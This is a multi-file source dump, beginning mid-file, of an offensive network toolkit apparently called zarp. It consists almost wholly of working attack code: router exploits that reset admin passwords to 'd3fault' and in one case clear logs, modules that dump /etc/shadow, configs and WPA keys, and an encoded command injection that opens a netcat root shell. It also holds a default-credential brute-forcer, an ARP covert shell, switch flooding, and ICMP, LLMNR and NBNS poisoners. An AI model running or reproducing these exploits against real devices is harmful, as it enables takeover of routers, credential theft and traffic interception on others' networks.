13 |         self.info = """
14 |                     Changes the admin psasword to d3fault and enables 
15 |                     remote administration on port 8080.
16 |                     http://www.exploit-db.com/exploits/15810/
17 |                     """
18 | 
19 |     def initialize(self):
20 |         util.Msg('Changing admin password to \'d3fault\' '
21 |                         'and enabling remote admin on port 8080...')
22 |         try:
23 |             url = 'http://%s/tools_admin.cgi?admname=admin&admPass1=d3fault' \
24 |                   '&admPass2=d3fault&username=admin&userPass1=d3fault&userPass2=d3fault' \
25 |                   '&hip1=*&hport=8080&hEnable=1' % self.config['target'].value
26 |             urllib.urlopen(url).read()
27 |             util.Msg('Admin password changed to \'d3fault\' '
28 |                                             'and interface enabled on 8080')
29 |         except Exception, e:
30 |             util.Error('Error: %s' % e)
31 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/change_admin_2640.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class change_admin_2640(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'DSL-2640B'
10 |         self.vuln   = 'Change Admin Password'
11 |         super(change_admin_2640, self).__init__()
12 |     
13 |         self.info = """
14 |                     Modify the admin password.
15 |                     http://www.exploit-db.com/exploits/18499/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Changing admin password to \'d3fault\'...')
20 |         try:
21 |             url = 'http://%s/redpass.cgi?sysPassword=d3fault&change=1' \
22 |                                         % self.config['target'].value
23 |             urllib.urlopen(url).read()
24 |             util.Msg('Done.  Admin password changed to \'d3fault\'')
25 |         except Exception, e:
26 |             util.Error('Error: %s' % e)
27 |             return
28 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/dlink/get_config_320b.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | import urllib
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | class get_config_320b(RouterVuln):
 6 | 
 7 |     def __init__(self):
 8 |         self.router = 'DSL-320B'
 9 |         self.vuln   = 'Read Configuration File'
10 |         super(get_config_320b, self).__init__()
11 |     
12 |         self.info = """
13 |                     Read the configuration file
14 |                     http://www.exploit-db.com/exploits/25251/
15 |                     """
16 | 
17 |     def initialize(self):
18 |         util.Msg('Fetching config from %s...' % self.config['target'].value)
19 |         url = 'http://%s/config.bin' % self.config['target'].value
20 |         try:
21 |             response = urllib.urlopen(url).read()
22 |             util.Msg(response)
23 |         except Exception, e:
24 |             util.Error('Error: %s' % e)
25 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/linksys/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = [ 'wap610n_dump', 'wrt54g_reset_admin', 'wag54gs_change_admin' ]
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/linksys/wag54gs_change_admin.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class wag54gs_change_admin(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'WAG54GS v1.01.03'
10 |         self.vuln   = 'Change Admin Password'
11 |         super(wag54gs_change_admin, self).__init__()
12 |     
13 |         self.info = """
14 |                     Change the admin password to d3fault.
15 |                     http://www.exploit-db.com/exploits/18503/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Changing admin password to \'d3fault\'...')
20 |         try:
21 |             url = 'http://%s/setup.cgi' % self.config['target'].value
22 |             params = urllib.urlencode({'user_list':'1','sysname':'admin','sysPasswd':'d3fault',
23 |                     'sysConfirmPasswd':'d3fault','remote_management':'disable',
24 |                     'devname':'','snmp_enable':'disable','upnp_enable':'enable',
25 |                     'wlan_enable':'disable','save':'Save+Settings','h_user_list':'1',
26 |                     'h_pwset':'yes','sysname_changed':'no','pwchanged':'yes',
27 |                     'pass_is_default':'false','pass_is_none':'no','h_remote_management':'disable',
28 |                     'c4_trap_ip':'','h_snmp_enable':'disable','h_upnp_enable':'enable',
29 |                     'h_wlan_enable':'disable','todo':'save','this_file':'Administration.htm',
30 |                     'next_file':'Administration.htm','message':''})
31 | 
32 |             response = urllib.urlopen(url, params).read()
33 |             print response
34 |             util.Msg('Done.  Password reset to \'d3fault\'')
35 |         except Exception, e:
36 |             util.Error('Error: %s' % e)
37 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/linksys/wap610n_dump.py:
--------------------------------------------------------------------------------
 1 | import telnetlib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class wap610n_dump(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'WAP610N v1.0.01'
10 |         self.vuln   = 'Unauthenticated File Disclosure'
11 |         super(wap610n_dump, self).__init__()
12 |     
13 |         self.info = """
14 |                     Unauthenticated root access over telnet
15 |                     http://www.exploit-db.com/exploits/16149/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Retrieving shadow...')
20 |         try:
21 |             tn = telnetlib.Telnet(self.config['target'].value)
22 |             tn.read_until('Command> ')
23 |             tn.write('system cat /etc/shadow\n')
24 |             data = tn.read_all()
25 |             tn.write('exit\n')
26 |         except Exception, e:
27 |             util.Error("Error: %s" % e)
28 |             return
29 |         print data
30 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/linksys/wrt54g_reset_admin.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class wrt54g_reset_admin(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'WRT54G v1.00.9'
10 |         self.vuln   = 'Reset Password'
11 |         super(wrt54g_reset_admin, self).__init__()
12 |     
13 |         self.info = """Reset admin password
14 |                     http://www.exploit-db.com/exploits/5313/
15 |                     """  
16 | 
17 |     def initialize(self):
18 |         util.Msg('Resetting admin password to \'d3fault\'...')
19 |         try:
20 |             url = 'http://%s/manage.tri?remote_mg_https=0&http_enable=1&https_enable=0' \
21 |                   '&PasswdModify=1&http_passwd=d3fault&http_passwdConfirm=d3fault' \
22 |                   '&_http_enable=1&web_wl_filter=1&remote_management=0&upnp=_enable=1'\
23 |                   '&layout=en' % self.config['target'].value
24 |             urllib.urlopen(url).read()
25 |             util.Msg('Done')
26 |         except Exception, e:
27 |             util.Error('Error: %s' % e)
28 |             return
29 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/netgear/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['wnr2000_get_pass', 'wpn824v3_get_config']
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/netgear/wnr2000_get_pass.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class wnr2000_get_pass(RouterVuln):
 7 |     
 8 |     def __init__(self):
 9 |         self.router = 'WNR2000 v1.2.0.8'
10 |         self.vuln   = 'Read WPA/WPA2 Password'
11 |         super(wnr2000_get_pass, self).__init__()
12 |     
13 |         self.info = """
14 |                     Read the WPA/WPA2 passphrase
15 |                     http://www.exploit-db.com/exploits/9498/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Fetching password from %s...' % self.config['target'].value)
20 |         url = 'http://%s/router-info.htm' % self.config['target'].value
21 |         url2 = 'http://%s/cgi-bin/router-info.htm' % self.config['target'].value
22 |         try:
23 |             response = urllib.urlopen(url).read()
24 |             response2 = urllib.urlopen(url2).read()
25 |             util.Msg('First:')
26 |             print '\t' + response
27 |             util.Msg('Second:')
28 |             print '\t' + response2
29 |         except Exception, e:
30 |             util.Error('Error: %s' % e)
31 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/netgear/wpn824v3_get_config.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import util
 3 | from ..router_vuln import RouterVuln
 4 | 
 5 | 
 6 | class wpn824v3_get_config(RouterVuln):
 7 | 
 8 |     def __init__(self):
 9 |         self.router = 'WPN824v3'
10 |         self.vuln   = 'Read Configuration File'
11 |         super(wpn824v3_get_config, self).__init__()
12 |     
13 |         self.info = """
14 |                     Read the configuration file
15 |                     http://www.exploit-db.com/exploits/25969/
16 |                     """
17 | 
18 |     def initialize(self):
19 |         util.Msg('Fetching config from %s...' % self.config['target'].value)
20 |         url = 'http://%s/cgi-bin/NETGEAR_wpn824v3.cfg' % self.config['target'].value
21 |         try:
22 |             response = urllib.urlopen(url).read()
23 |             util.Msg(response)
24 |         except Exception, e:
25 |             util.Error('Error: %s' % e)
26 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/rosewill/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['rsva_backdoor']
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/rosewill/rsva_backdoor.py:
--------------------------------------------------------------------------------
 1 | import socket
 2 | import util
 3 | from time import sleep
 4 | from ..router_vuln import RouterVuln
 5 | 
 6 | 
 7 | class rsva_backdoor(RouterVuln):
 8 |     
 9 |     def __init__(self):
10 |         self.router = 'RSVA11001'
11 |         self.vuln   = 'Backdoor Root'
12 |         self.inject = "UkVNT1RFIEhJX1NSREtfVElNRV9TZXRUaW1lU2V0QXR0ciBNQ1RQLzEuMA0KQ"\
13 |                     "1NlcTo2Ng0KQWNjZXB0OnRleHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFAN"\
14 |                     "CkZ1bmMtVmVyc2lvbjoweDEwDQpDb250ZW50LUxlbmd0aDoxMjQNCg0KU2VnbWV"\
15 |                     "udC1OdW06MQ0KU2VnbWVudC1TZXE6MQ0KRGF0YS1MZW5ndGg6NzYNCg0KAQAGAW"\
16 |                     "E7L3Vzci9iaW4vbmMgLWwgLXAgNTU1NSAtZSAvYmluL3NoAA4jAQBAAAAAAAAAA"\
17 |                     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="
18 |         self.hard_save = "UkVNT1RFIEhJX1NSREtfREVWX1NhdmVGbGFzaCBNQ1RQLzEuMA0KQ1NlcT"\
19 |                          "o0MQ0KQWNjZXB0OnRleHQvSERQDQpDb250ZW50LVR5cGU6dGV4dC9IRFAN"\
20 |                          "CkZ1bmMtVmVyc2lvbjoweDEwDQpDb250ZW50LUxlbmd0aDoxNQ0KDQpTZW"\
21 |                          "dtZW50LU51bTowDQo="
22 |         super(rsva_backdoor, self).__init__()
23 |     
24 |         self.info = """
25 |                     Execute a remote netcat shell through command injection
26 |                     http://www.exploit-db.com/exploits/24892
27 |                     """
28 | 
29 |     def initialize(self):
30 |         try:
31 |             util.Msg('Executing command injection on %s...' % self.config['target'].value)
32 |             sock = socket.socket()
33 |             sock.connect((self.config['target'].value, 8000))
34 |             sock.sendall(self.inject)
35 |             sleep(3)
36 |             util.Msg('Forcing the device to save...')
37 |             sock.sendall(self.hard_save)
38 |             sock.close()
39 |             util.Msg('Reboot router for root shell on %s:5555' % (self.config['target'].value))
40 |         except Exception, e:
41 |             util.Error('Error: %s' % e)
42 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/router_vuln.py:
--------------------------------------------------------------------------------
 1 | import abc
 2 | import urllib2
 3 | from base64 import b64encode
 4 | from util import Msg
 5 | from module import ZarpModule
 6 | from zoption import Zoption
 7 | from default_passwords import default_list
 8 | 
 9 | 
10 | class RouterVuln(ZarpModule):
11 |     """Abstract router vulnerability"""
12 | 
13 |     def __init__(self):
14 |         super(RouterVuln, self).__init__("%s - %s" % (self.router, self.vuln))
15 |         self.config.update({"target":Zoption(type = "ip",
16 |                                         value = "192.168.1.1",
17 |                                         required = False,
18 |                                         display = "Address to target")
19 |                             })
20 | 
21 |     def attempt_login(self, brand):
22 |         """ Attempts to login to the router with default credentials. This will
23 |             only work with routers that use HTTP basic auth.
24 |             brand is the type of router being hit.
25 | 
26 |             Useful for vulnerabilities that require authentication.
27 |         """
28 |         try:
29 |             Msg('Attempting to discover credentials for %s...' % self.ip)
30 |             wordlist = default_list(brand)
31 |             for username in wordlist['username']:
32 |                 for password in wordlist['password']:
33 |                     # look for a 200
34 |                     auth_string = b64encode('%s:%s' % (username, password))
35 |                     opener = urllib2.build_opener()
36 |                     opener.addheaders.append(('Authorization', 'Basic %s'
37 |                                                                 % auth_string))
38 | 
39 |                     try:
40 |                         response = opener.open('http://%s/' % self.ip)
41 |                         if response.getcode() is 200:
42 |                             Msg('Credentials found - %s:%s'
43 |                                                     % (username, password))
44 |                             return
45 |                     except urllib2.HTTPError, e:
46 |                         if e.code is 401:
47 |                             pass
48 |             Msg('No credentials found.')
49 |         except Exception, e:
50 |             print e
51 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/zoom/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ['x4_5_mod_password']
2 | 


--------------------------------------------------------------------------------
/src/modules/parameter/routers/zoom/x4_5_mod_password.py:
--------------------------------------------------------------------------------
 1 | from ..router_vuln import RouterVuln
 2 | import util
 3 | import urllib
 4 | 
 5 | 
 6 | class x4_5_mod_password(RouterVuln):
 7 |     
 8 |     def __init__(self):
 9 |         self.router = 'X4/X5 ADSL Modem/Router <=2.5 and 3.0'
10 |         self.vuln   = 'Change Admin Password'
11 |         super(x4_5_mod_password, self).__init__()
12 |     
13 |         self.info = """
14 |                     Modify the administrative password to 'd3fault'
15 |                     http://seclists.org/bugtraq/2013/Jul/56
16 |                     """
17 | 
18 |     def initialize(self):
19 |         version = util.get_input('Enter Zoom version [2/3]: ')
20 |         util.Msg('Changing admin password to \'d3fault\'...')
21 | 
22 |         url_25 = 'http://%s/hag/emweb/PopOutUserModify.htm/FormOne&user=admin&'\
23 |                  'ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&id=3&'\
24 |                  'cmdSubmit=Save+Changes' % self.config['target'].value
25 |         url_30 = 'http://%s/hag/emweb/PopOutUserModify.htm?id=40&user=admin&'\
26 |                  'Zadv=1&ex_param1=admin&new_pass1=d3fault&new_pass2=d3fault&'\
27 |                  'id=3&cmdSubmit=Save+Changes' % self.config['target'].value
28 |         url_logs = 'http://%s/Action?id=76&cmdClear+Log=Clear+Log' % self.config['target'].value
29 | 
30 |         try:
31 |             if version == '2':
32 |                 urllib.urlopen(url_25).read()
33 |             else:
34 |                 urllib.urlopen(url_30).read()
35 | 
36 |             util.Msg("Password reset, clearing logs...")
37 |             urllib.urlopen(url_logs).read()
38 |             util.Msg('Done.  Connect to %s with admin:d3fault' % self.config['target'].value)
39 |         except Exception, e:
40 |             util.Error('Unable to connect: %s' % e)
41 | 


--------------------------------------------------------------------------------
/src/modules/parameter/slarpc.py:
--------------------------------------------------------------------------------
  1 | from scapy.all import *
  2 | from struct import unpack
  3 | from threading import Thread
  4 | from parameter import Parameter
  5 | from time import sleep
  6 | from getpass import getpass
  7 | import zcrypto
  8 | import util
  9 | 
 10 | """ slarpc implements the client portion
 11 |     of the ARP shell.  slarpd should be running
 12 |     on a remote host before invoking.  Basic encryption
 13 |     is supported using RC4.  TODO would be a DH exchange.
 14 | 
 15 |     Two caveats with this: you'll need root on the remote
 16 |     server, and because Python is userland, you'll see two
 17 |     ARP responses per ARP packet.
 18 | 
 19 |     Enter "slarp-shutdown" to kill the remote daemon or just
 20 |     "exit" to end the shell.
 21 | """
 22 | 
 23 | 
 24 | class slarpc(Parameter):
 25 |     def __init__(self):
 26 |         conf.verb = 0
 27 |         self.remote_host = None
 28 | 
 29 |         self.encrypt = False
 30 |         self.rc4 = None
 31 |         super(slarpc, self).__init__('ARP Shell')
 32 | 
 33 |     def sender_ip(self, data):
 34 |         """Unpack the source IP address"""
 35 |         ip = unpack('!4s', data[28:32])
 36 |         return socket.inet_ntoa(ip[0])
 37 | 
 38 |     def receive(self):
 39 |         """Receive ARP packets on a raw socket"""
 40 |         try:
 41 |             sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW,
 42 |                                     socket.ntohs(0x0806))
 43 |             while True:
 44 |                 data = sock.recv(1024)
 45 |                 if self.sender_ip(data) == self.remote_host and data[42] != '\x00':
 46 |                     if self.encrypt:
 47 |                         data = self.rc4.decrypt(data[42:].replace('\x00', ''))
 48 |                     else:
 49 |                         data = data[42:].replace('\x00', '')
 50 |                     print data
 51 |                     return
 52 |         except Exception, e:
 53 |             util.Error(e)
 54 | 
 55 |     def send(self, cmd):
 56 |         """Send the command to the remote host"""
 57 |         try:
 58 |             if self.encrypt:
 59 |                 cmd = self.rc4.encrypt(cmd)
 60 |             pkt = Ether() / ARP(pdst=self.remote_host)
 61 |             pkt /= cmd
 62 |             sendp(pkt, count=1)
 63 |         except Exception, e:
 64 |             util.Error(e)
 65 | 
 66 |     def shell(self):
 67 |         """Implements the shell"""
 68 |         while True:
 69 |             cmd = raw_input("# ")
 70 |             if cmd == 'exit':
 71 |                 # exit shell
 72 |                 break
 73 |             elif cmd == 'slarp-shutdown':
 74 |                 # shutdown remote daemon and exit
 75 |                 self.send('3')
 76 |                 break
 77 |             elif len(cmd) <= 1:
 78 |                 continue
 79 | 
 80 |             # packets come quick, so we need to start listening first
 81 |             tmp = Thread(target=self.receive)
 82 |             tmp.start()
 83 |             self.send('1' + cmd)
 84 |             sleep(.25)
 85 | 
 86 |     def initialize_crypto(self):
 87 |         """Initialize RC4"""
 88 |         self.rc4 = zcrypto.RC4()
 89 |         self.rc4.key = getpass('[!] Enter encryption password: ')
 90 | 
 91 |     def initialize(self):
 92 |         """Fetch remote host and perform any encryption
 93 |            runtime generation.
 94 |         """
 95 |         util.Msg('The slarpd daemon should be running on the remote host!')
 96 | 
 97 |         while True:
 98 |             try:
 99 |                 tmp = raw_input('[!] Remote host: ')
100 |                 if len(tmp.split('.')) is 4:
101 |                     self.remote_host = tmp
102 | 
103 |                 tmp = raw_input('[!] Encrypt traffic? ')
104 |                 if not 'n' in tmp.lower():
105 |                     self.initialize_crypto()
106 |                     util.Msg('Traffic encrypted.')
107 |                     self.encrypt = True
108 |                 break
109 |             except Exception, e:
110 |                 util.Error(e)
111 |         util.Msg('Spawning remote shell to %s' % (self.remote_host))
112 |         self.shell()
113 | 


--------------------------------------------------------------------------------
/src/modules/parameter/switchover.py:
--------------------------------------------------------------------------------
 1 | import util
 2 | from scapy.all import ARP, Ether, sendp
 3 | from scapy.volatile import RandMAC
 4 | from scapy.layers.l2 import getmacbyip
 5 | from threading import Thread
 6 | from parameter import Parameter
 7 | from zoption import Zoption
 8 | 
 9 | 
10 | class switchover(Parameter):
11 |     """ Flood a switch with ARP packets in an attempt
12 |         to get it to failover into a hub.  Not all switch's
13 |         will do this, but this is the general case.
14 |     """
15 |     def __init__(self):
16 |         super(switchover, self).__init__('Switch Over')
17 |         self.switch = None
18 |         self.sent = 0
19 |         self.config.update({"target":Zoption(type = "ip", 
20 |                                       value = "FF:FF:FF:FF:FF:FF",
21 |                                       required = False, 
22 |                                       display = "Switch address")
23 |                            })
24 |         self.info = """
25 |                     In some switches, if the ARP table is overflowed,
26 |                     the device will switch from routing packets to simply
27 |                     spewing packets to each port, a la a hub.  This will
28 |                     allow an attacker who may have been unable to sniff
29 |                     or poison certain traffic the ability to."""
30 | 
31 |     def initialize(self):
32 |         util.Msg("Starting switch flood...")
33 |         self.switch = getmacbyip(self.config['target'].value)
34 |         self.running = True
35 | 
36 |         thread = Thread(target=self.spam)
37 |         thread.start()
38 |         return True
39 | 
40 |     def spam(self):
41 |         """ Begin spamming the switch with ARP packets from
42 |             random MAC's
43 |         """
44 |         arp = ARP(op=2, psrc='0.0.0.0', hwdst=self.switch)
45 |         while self.running:
46 |             pkt = Ether(src=RandMAC(), dst=self.switch)
47 |             pkt /= arp
48 |             sendp(pkt)
49 |             self.sent += 1
50 |             if self.sent % 50 == 0:
51 |                 self.log_msg('Sent %d requests...' % (self.sent))
52 | 
53 |     def view(self):
54 |         """ Dump out the number of requests initially
55 |         """
56 |         util.Msg('Sent %d MAC requests thus far' % (self.sent))
57 |         super(switchover, self).view()
58 | 
59 |     def session_view(self):
60 |         return "Spamming %s" % self.config['target'].value
61 | 


--------------------------------------------------------------------------------
/src/modules/poison/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = ["arp","dns","dhcp","nbns","llmnr","icmp"]
2 | 


--------------------------------------------------------------------------------
/src/modules/poison/icmp.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from poison import Poison
 3 | from threading import Thread
 4 | from zoption import Zoption
 5 | import time
 6 | import config
 7 | import util
 8 | 
 9 | 
10 | class icmp(Poison):
11 |     def __init__(self):
12 |         super(icmp, self).__init__('ICMP Redirection')
13 |         conf.verb = 0
14 |         self.local  = (config.get('ip_addr'), get_if_hwaddr(config.get('iface')))
15 |         self.victim = ()
16 |         self.target = ()
17 |         self.config.update({"victim_ip":Zoption(type = "ip", 
18 |                                          value = None,
19 |                                          required = True, 
20 |                                          display = "Redirect host"),
21 |                             "target_ip":Zoption(type = "ip", 
22 |                                          value = None,
23 |                                          required = True, 
24 |                                          display = "Redirect victim to"),
25 |                             "respoof":Zoption(type = "int", 
26 |                                        value = 15,
27 |                                        required = False, 
28 |                     display = "Interval (seconds) to send respoofed redirects")
29 |                            })
30 |         self.info = """
31 |                     Send ICMP redirects to a victim.  The victim system needs
32 |                     to be configured to allow ICMP redirects, which is not 
33 |                     the default case.
34 |                     """
35 | 
36 |     def initialize(self):
37 |         """ initialize a poison
38 |         """
39 |         util.Msg('Initializing ICMP poison...')
40 |         self.victim = (self.config['victim_ip'].value, 
41 |                 getmacbyip(self.config['victim_ip'].value))
42 |         self.target = (self.config['target_ip'].value,
43 |                 getmacbyip(self.config['target_ip'].value))
44 | 
45 |         self.running = True
46 |         thread = Thread(target=self.inject)
47 |         thread.start()
48 |         return self.victim[0]
49 | 
50 |     def inject(self):
51 |         """ Send ICMP redirects to the victim
52 |         """
53 |         # icmp redirect
54 |         pkt = IP(src=self.target[0], dst=self.victim[0])
55 |         pkt /= ICMP(type=5, code=1, gw=self.local[0])
56 | 
57 |         # fake UDP
58 |         pkt /= IP(src=self.victim[0], dst=self.target[0])
59 |         pkt /= UDP()
60 | 
61 |         while self.running:
62 |             send(pkt)
63 |             time.sleep(self.config['respoof'].value)
64 | 
65 |         return self.victim[0]
66 | 
67 |     def shutdown(self):
68 |         """ Shutdown ICMP spoofing
69 |         """
70 |         if self.running:
71 |             util.Msg("Shutting ICMP redirect down "\
72 |                     "(this could take up to %s seconds)" % \
73 |                         self.config['respoof'].value)
74 |             self.running = False
75 |         return True


--------------------------------------------------------------------------------
/src/modules/poison/llmnr.py:
--------------------------------------------------------------------------------
 1 | from scapy.all import *
 2 | from poison import Poison
 3 | from threading import Thread
 4 | from zoption import Zoption
 5 | import util
 6 | import config
 7 | 
 8 | 
 9 | class llmnr(Poison):
10 |     def __init__(self):
11 |         super(llmnr, self).__init__("LLMNR Spoofer")
12 |         conf.verb = 0
13 |         self.local = (config.get('ip_addr'), get_if_hwaddr(config.get('iface')))
14 |         self.config.update({"regex_match":Zoption(type = "regex", 
15 |                                            value = None,
16 |                                            required = True, 
17 |                                            display = "Match request regex"),
18 |                             "redirect":Zoption(type = "ip", 
19 |                                         value = None,
20 |                                         required = True, 
21 |                                         display = "Redirect to")
22 |                            })
23 |         self.info = """
24 |                     Poisoner for LLMNR.  LLMNR is essentially DNS + NBNS
25 |                     introduced in Windows Vista, and supercedes NBNS for
26 |                     new versions of Windows.
27 | 
28 |                     More: http://en.wikipedia.org/wiki/LLMNR
29 |                     """
30 | 
31 |     def initialize(self):
32 |         util.Msg('Starting LLMNR spoofer...')
33 |         sniffr = Thread(target=self.sniff_thread)
34 |         sniffr.start()
35 |         self.running = True
36 |         return True
37 | 
38 |     def handler(self, pkt):
39 |         """ Handle and parse requests """
40 |         if pkt.haslayer(LLMNRQuery):
41 |             request = pkt[LLMNRQuery][DNSQR].qname
42 |             ret = self.config['regex_match'].value.search(request.lower())
43 |             if ret is None:
44 |                 return
45 | 
46 |             if not ret.group(0) is None and pkt[Ether].dst != self.local[0]:
47 |                 # craft our poisoned response
48 |                 r_id = pkt[LLMNRQuery].id
49 |                 response = Ether(dst=pkt[Ether].src, src=self.local[1])
50 |                 if IP in pkt:
51 |                     response /= IP(dst=pkt[IP].src)
52 |                     response /= UDP(sport=5355, dport=pkt[UDP].sport)
53 |                 elif IPv6 in pkt:
54 |                     response /= IPv6(dst=pkt[IPv6].src)
55 |                     response /= UDP(sport=5355, dport=pkt[UDP].sport)
56 |                 response /= LLMNRQuery(id=pkt[LLMNRQuery].id,
57 |                             qd=pkt[LLMNRQuery].qd, qr=1, qdcount=1, ancount=1,
58 |                             arcount=1, nscount=1, rcode=0,
59 |                             ns=self.gen_dnsrr(pkt), ar=self.gen_dnsrr(pkt),
60 |                             an=self.gen_dnsrr(pkt))
61 |                 sendp(response)
62 |                 self.log_msg('Spoofing \'%s\' from %s'
63 |                                 % (request.strip(), pkt[Ether].src))
64 | 
65 |     def gen_dnsrr(self, pkt):
66 |         """ Generates a DNSRR for the LLMNRResponse
67 |             packet.
68 |         """
69 |         return DNSRR(rrname=pkt[LLMNRQuery].qd.name, ttl=40000, rdlen=4,
70 |                 rdata=self.config['redirect'].value)
71 | 
72 |     def sniff_thread(self):
73 |         """ LLMNR is on UDP port 5355
74 |         """
75 |         sniff(filter='udp and port 5355', prn=self.handler, store=0,
76 |                         stopper=self.test_stop, stopperTimeout=3)
77 | 
78 |     def shutdown(self):
79 |         """ Shutdown the sniffer """
80 |         util.Msg('Shutting down LLMNR poisoner...')
81 |         if self.running:
82 |             self.running = False
83 |         return True
84 | 
85 |     def session_view(self):
86 |         """ Override session view"""
87 |         return '%s -> %s' % (self.config['regex_match'].getStr(),
88 |                  self.config['redirect'].value)
89 | 


--------------------------------------------------------------------------------
/src/modules/poison/nbns.py:
--------------------------------------------------------------------------------
 1 | import re
 2 | from threading import Thread
 3 | from scapy.all import *
 4 | from zoption import Zoption
 5 | from poison import Poison
 6 | import util
 7 | import config
 8 | 
 9 | 
10 | class nbns(Poison):
11 |     def __init__(self):
12 |         super(nbns, self).__init__('NBNS Poison')
13 |         conf.verb = 0
14 |         self.local_mac = get_if_hwaddr(config.get('iface'))
15 |         self.config.update({"regex_match":Zoption(type = "regex", 
16 |                                            value = None,
17 |                                            required = True, 
18 |                                            display = "Match request regex"),
19 |                             "redirect":Zoption(type = "ip", 
20 |                                         value = None,
21 |                                         required = True, 
22 |                                         display = "Redirect to")
23 |                            })
24 |         self.info = """
25 |                     Implements NBNS spoofing.
26 |                     Requests are matched based on Python's regex parser.
27 |                     """
28 | 
29 |     def handler(self, pkt):
30 |         """Callback for packets"""
31 |         if pkt.haslayer(NBNSQueryRequest):
32 |             request = pkt[NBNSQueryRequest].getfieldval('QUESTION_NAME')
33 |             ret = self.config['regex_match'].value.search(request.lower())
34 |             if ret is None:
35 |                 return
36 | 
37 |             if not ret.group(0) is None and pkt[Ether].dst != self.local_mac \
38 |                       and pkt[IP].src != util.get_local_ip(config.get('iface')):
39 |                 trans_id = pkt[NBNSQueryRequest].getfieldval('NAME_TRN_ID')
40 |                 response = Ether(dst=pkt[Ether].src, src=self.local_mac)
41 |                 response /= IP(dst=pkt[IP].src) / UDP(sport=137, dport=137)
42 |                 response /= NBNSQueryResponse(NAME_TRN_ID=trans_id,
43 |                   RR_NAME=request, NB_ADDRESS=self.config['redirect'].value)
44 |                 del response[UDP].chksum  # recalc checksum
45 |                 sendp(response)    # layer 2 send for performance
46 |                 self.log_msg('Spoofing \'%s\' from %s'
47 |                                         % (request.strip(), pkt[IP].src))
48 | 
49 |     def initialize(self):
50 |         """Initialize spoofer
51 |         """
52 |         util.Msg('Starting NBNS spoofer...')
53 |         sniffr = Thread(target=self.sniff_thread)
54 |         sniffr.start()
55 |         self.running = True
56 |         return True
57 | 
58 |     def sniff_thread(self):
59 |         """Sniff packets"""
60 |         sniff(filter='udp and port 137', prn=self.handler, store=0,
61 |                                 stopper=self.test_stop, stopperTimeout=3)
62 | 
63 |     def shutdown(self):
64 |         """Shutdown sniffer"""
65 |         util.Msg("Shutting down NBNS spoofer...")
66 |         if self.running:
67 |             self.running = False
68 |         return True
69 | 
70 |     def session_view(self):
71 |         """Override session viewer"""
72 |         return '%s -> %s' % (self.config['regex_match'].getStr(),
73 |                 self.config['redirect'].value)
74 | 


--------------------------------------------------------------------------------
/src/modules/poison/poison.py:
--------------------------------------------------------------------------------
 1 | from module import ZarpModule
 2 | import util
 3 | 
 4 | 
 5 | class Poison(ZarpModule):
 6 |     """ Abstract poison module
 7 |     """
 8 |     def __init__(self, which):
 9 |         super(Poison, self).__init__(which)
10 | 
11 |     def test_stop(self):
12 |         """ Callback for stopping a sniffer
13 |         """
14 |         if self.running:
15 |             return False
16 |         util.debug("Stopping sniffer threads for %s.." % self.which)
17 |         return True


--------------------------------------------------------------------------------
/src/modules/scanner/__init__.py:
--------------------------------------------------------------------------------
1 | __all__ = [ 'ap_scan', 'net_map', 'service_scan', 'passive_scan']
2 | 


--------------------------------------------------------------------------------
/src/modules/scanner/ap_scan.py:
--------------------------------------------------------------------------------
 1 | import os
 2 | import util
 3 | from scanner import Scanner
 4 | 
 5 | 
 6 | class ap_scan(Scanner):
 7 |     def __init__(self):
 8 |         self.channel = None
 9 |         super(ap_scan, self).__init__('AP Scan')
10 |         self.info = """
11 |                     Scan for wireless APs.  Useful when searching for WEP or
12 |                     unprotected APs.  Essentially an interface to airodump-ng.
13 |                     """
14 | 
15 |     def initialize(self):
16 |         """ Initialize the scanner
17 |         """
18 |         try:
19 |             if not util.check_program('airmon-ng'):
20 |                 util.Error('airomon-ng not installed.  Please install to continue.')
21 |                 return None
22 |             util.Msg('(ctrl^c) when finished.')
23 |             iface = util.get_monitor_adapter()
24 |             if iface is None:
25 |                 util.Msg('No devices found in monitor mode.  Enabling...')
